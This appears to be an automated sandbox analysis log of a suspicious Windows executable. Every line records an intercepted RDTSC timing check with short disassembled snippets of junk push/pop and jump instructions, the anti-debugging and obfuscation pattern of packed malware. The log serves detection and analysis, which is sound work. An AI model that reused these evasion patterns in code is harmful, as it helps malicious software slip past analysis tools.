Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 114372D second address: 1143731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1143731 second address: 1143735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1143735 second address: 114373B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C7B3A second address: 11C7B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C7B42 second address: 11C7B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C7B46 second address: 11C7B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C7B51 second address: 11C7B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD6F84FEE66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C7B5D second address: 11C7B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C8463 second address: 11C846E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C846E second address: 11C8472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C8472 second address: 11C8478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C85E2 second address: 11C85E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C85E8 second address: 11C85EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C8739 second address: 11C8792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FD826h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d jnp 00007FD6F84FD816h 0x00000013 jno 00007FD6F84FD816h 0x00000019 jmp 00007FD6F84FD820h 0x0000001e popad 0x0000001f popad 0x00000020 pushad 0x00000021 pushad 0x00000022 jmp 00007FD6F84FD829h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C8792 second address: 11C8798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C8798 second address: 11C87BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD6F84FD827h 0x0000000b pushad 0x0000000c popad 0x0000000d jl 00007FD6F84FD816h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11C87BF second address: 11C87C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 114BF31 second address: 114BF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11CF47B second address: 11CF480 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11CF480 second address: 11CF48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1155C7C second address: 1155C80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D4DA3 second address: 11D4DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D4DA9 second address: 11D4DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D4DAE second address: 11D4DB8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD6F84FD81Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D3CB4 second address: 11D3CBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D3CBC second address: 11D3CC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D3CC0 second address: 11D3CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FD6F84FEE6Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D3CD0 second address: 11D3CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D3CDB second address: 11D3CE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D3CE6 second address: 11D3CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D3CEC second address: 11D3CF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FD6F84FEE66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D380D second address: 11D3811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DA6D6 second address: 11DA6DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D91E5 second address: 11D91F1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD6F84FD816h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D91F1 second address: 11D9207 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD6F84FEE70h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D94D8 second address: 11D94E2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD6F84FD816h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D94E2 second address: 11D94E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D9654 second address: 11D966B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD6F84FD81Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D97BF second address: 11D97CD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD6F84FEE68h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D9925 second address: 11D9969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FD6F84FD816h 0x00000009 jo 00007FD6F84FD816h 0x0000000f jnl 00007FD6F84FD816h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jg 00007FD6F84FD82Bh 0x00000020 jmp 00007FD6F84FD81Fh 0x00000025 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D9A9C second address: 11D9AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D9AA0 second address: 11D9AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D9AA4 second address: 11D9AC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FD6F84FEE79h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D9AC7 second address: 11D9AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FD6F84FD816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11D9AD1 second address: 11D9AE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FEE74h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119677C second address: 1173375 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sbb di, 4F4Dh 0x0000000d call dword ptr [ebp+122D296Ah] 0x00000013 jmp 00007FD6F84FD81Fh 0x00000018 jo 00007FD6F84FD837h 0x0000001e jmp 00007FD6F84FD823h 0x00000023 push ecx 0x00000024 je 00007FD6F84FD816h 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1196D01 second address: 1196D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1196D05 second address: 1196D29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop eax 0x00000008 mov edx, 0A9358F6h 0x0000000d push F294BC26h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD6F84FD81Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1197522 second address: 1197527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1197527 second address: 119752D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119752D second address: 1197531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1197531 second address: 1197550 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD6F84FD816h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD6F84FD81Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 1197550 second address: 119755A instructions: 0x00000000 rdtsc 0x00000002 js 00007FD6F84FEE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 119755A second address: 11975AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD6F84FD82Dh 0x00000008 jmp 00007FD6F84FD827h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FD6F84FD818h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000019h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a push 0000001Eh 0x0000002c jmp 00007FD6F84FD81Ah 0x00000031 push eax 0x00000032 push ecx 0x00000033 push ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11976AE second address: 11976B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11976B5 second address: 11976BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11976BB second address: 11976BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11976BF second address: 11976DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FD822h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11976DE second address: 11976E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DE442 second address: 11DE446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DE446 second address: 11DE452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DE452 second address: 11DE458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DE458 second address: 11DE46E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD6F84FEE6Ch 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DE5C4 second address: 11DE5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DE5CA second address: 11DE5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FD6F84FEE66h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DE5DE second address: 11DE600 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FD828h 0x00000007 jo 00007FD6F84FD816h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DE767 second address: 11DE781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FD6F84FEE6Bh 0x0000000c jng 00007FD6F84FEE6Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DEA65 second address: 11DEA75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007FD6F84FD816h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DEBC3 second address: 11DEBFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD6F84FEE6Fh 0x00000007 jmp 00007FD6F84FEE78h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FD6F84FEE6Ah 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DEBFC second address: 11DEC44 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD6F84FD818h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007FD6F84FD825h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jmp 00007FD6F84FD824h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD6F84FD81Ch 0x00000020 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DEDE3 second address: 11DEDE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11DEDE9 second address: 11DEE2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD6F84FD81Ah 0x0000000c push ebx 0x0000000d jmp 00007FD6F84FD823h 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jnp 00007FD6F84FD82Ch 0x0000001e jmp 00007FD6F84FD826h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E2010 second address: 11E2020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD6F84FEE66h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E2020 second address: 11E202F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD6F84FD816h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E202F second address: 11E2033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E5444 second address: 11E5448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E4CD6 second address: 11E4CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD6F84FEE72h 0x00000009 popad 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E4FC1 second address: 11E4FE3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007FD6F84FD816h 0x00000009 jns 00007FD6F84FD816h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD6F84FD81Bh 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E4FE3 second address: 11E5002 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD6F84FEE66h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FD6F84FEE6Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E512C second address: 11E5132 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E5132 second address: 11E513D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E513D second address: 11E514A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E514A second address: 11E516B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FD6F84FEE78h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E516B second address: 11E5175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FD6F84FD816h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E5175 second address: 11E5189 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD6F84FEE66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e je 00007FD6F84FEE66h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E93F4 second address: 11E9409 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD6F84FD816h 0x00000008 jp 00007FD6F84FD816h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E8D4F second address: 11E8D55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E8D55 second address: 11E8D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E8D59 second address: 11E8D5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TNyOrM6mIM.exe	RDTSC instruction interceptor: First address: 11E8D5D second address: 11E8D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
